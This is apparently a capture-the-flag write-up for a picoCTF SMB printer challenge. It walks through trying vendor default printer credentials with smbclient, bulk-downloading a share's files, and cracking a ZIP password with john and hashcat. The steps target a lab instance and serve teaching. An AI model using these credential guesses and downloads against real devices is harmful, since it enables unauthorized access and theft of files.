Description
A Secure Printer is now in use. I'm confident no one can leak the message again... or can you?
Setup
Launch the challenge instance and note the host and port.
This is a follow-up to Printer Shares - the server is 'more secure' but still uses SMB.
sudo apt install smbclientSolution
Walk me through it- Step 1List SMB shares with default credentialsThe server now requires credentials. Default printer/MFP creds are vendor-dependent: HP, Xerox, Canon, Kyocera, Ricoh, and Brother all ship with different documented defaults. Try the common pairs in order, easiest first.bash
# Anonymous / guest first - sometimes still allowed:bashsmbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -Nbashsmbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U guest%bash# Generic admin defaults:bashsmbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%adminbashsmbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%passwordbashsmbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%bash# Vendor-specific defaults:bash# HP / HP LaserJet:bashsmbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%hpinventbash# Xerox WorkCentre:bashsmbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%1111bashsmbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%2222bash# Canon:bashsmbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U ADMIN%canonbashsmbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U 7654321%7654321bash# Kyocera:bashsmbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U Admin%Adminbashsmbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin00%admin00bash# Ricoh:bashsmbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%passwordbash# Brother:bashsmbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%initpassbash# Application-themed:bashsmbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U printer%printerLearn more
SMB (Server Message Block) is a network protocol used primarily for file sharing, printer sharing, and network browsing. It's the protocol behind Windows "network shares" (\\server\share) and is also implemented on Linux via Samba. SMB has a long history of critical vulnerabilities - EternalBlue (MS17-010) used by the WannaCry ransomware exploited an SMB buffer overflow to achieve unauthenticated remote code execution.
Default credentials are a pervasive problem in embedded devices, printers, and enterprise equipment. Vendors ship devices with factory-set usernames and passwords (admin/admin, guest/(blank), printer/printer) because it simplifies initial setup. When organisations deploy these devices without changing the defaults, they create trivially accessible entry points.
The
smbclientsyntax for credentials is-U username%password. For anonymous (guest) access,-U guest%sends guest with an empty password, and-Nskips authentication entirely (null session). Tools likeenum4linuxandnmap --script smb-enum-sharesautomate SMB enumeration more comprehensively. - Step 2Connect to the shareConnect to the shares directory using the working credentials.bash
smbclient //HOST/shares -p PORT -U guest%Learn more
SMB shares have access control lists that can restrict which users can connect and what operations they can perform (read, write, change). In this challenge, the "security" improvement over Printer Shares 1 is requiring authentication - but default printer credentials still grant access, demonstrating that authentication alone doesn't mean security if the credentials are weak or default.
In real SMB audits, after finding valid credentials you enumerate:
smbclient -Lto list all shares (including hidden ones ending in$), then connect to each share and runrecurse ON; lsto recursively list all files. Tools likesmbmapdo this automatically and show read/write permissions per share per user.The
-p PORTflag is necessary here because the challenge runs SMB on a non-standard port instead of the default 445 (or 139 for older NetBIOS-over-TCP). In real network reconnaissance, a full port scan (nmap -p-or at leastnmap -p 139,445) is the first step to finding SMB services regardless of port. - Step 3Navigate and download the flagUse recurse ON; ls inside smbclient to walk every subdirectory at once instead of cd-ing manually. If the flag is inside a password-protected ZIP, crack it offline with zip2john + john.bash
# Inside the smbclient prompt:bashrecurse ONbashprompt OFFbashlsbash# Pull everything in one shot:bashmget *bashexitbash# If you find a password-protected ZIP, crack it:bashzip2john secret.zip > zip.hashbashjohn --wordlist=/usr/share/wordlists/rockyou.txt zip.hashbash# Or with hashcat (mode 13600 = WinZip):bashhashcat -m 13600 -a 0 zip.hash /usr/share/wordlists/rockyou.txtbash# Then extract with the cracked password:bashunzip -P <password> secret.zipbashcat flag.txtLearn more
The
smbclientinteractive shell uses familiar Unix-like commands (ls,cd,get,put,mkdir) to navigate and transfer files.get filenamedownloads a file to your local current directory. For bulk downloads,mget *(withprompt OFFto skip confirmation) downloads all files in the current directory.Hidden shares (ending in
$) likeADMIN$,C$, andIPC$are administrative shares that require administrator credentials but can reveal a great deal about the system. On Windows,C$gives direct access to the C: drive if you have administrator rights - this is why credential theft combined with SMB is so powerful in lateral movement during real attacks.After downloading files, always verify them with
fileandstrings. Sometimes flags are embedded in binary files, images, or PDFs rather than plain text files, requiring additional forensic extraction steps. For the SMB recon toolkit see Networking tools for CTF; for offline ZIP/RAR password cracking see Hash cracking for CTF.
Flag
picoCTF{pr1nt3r_shar3s_2_...}
The second printer challenge requires authentication - default printer credentials grant access to the flag.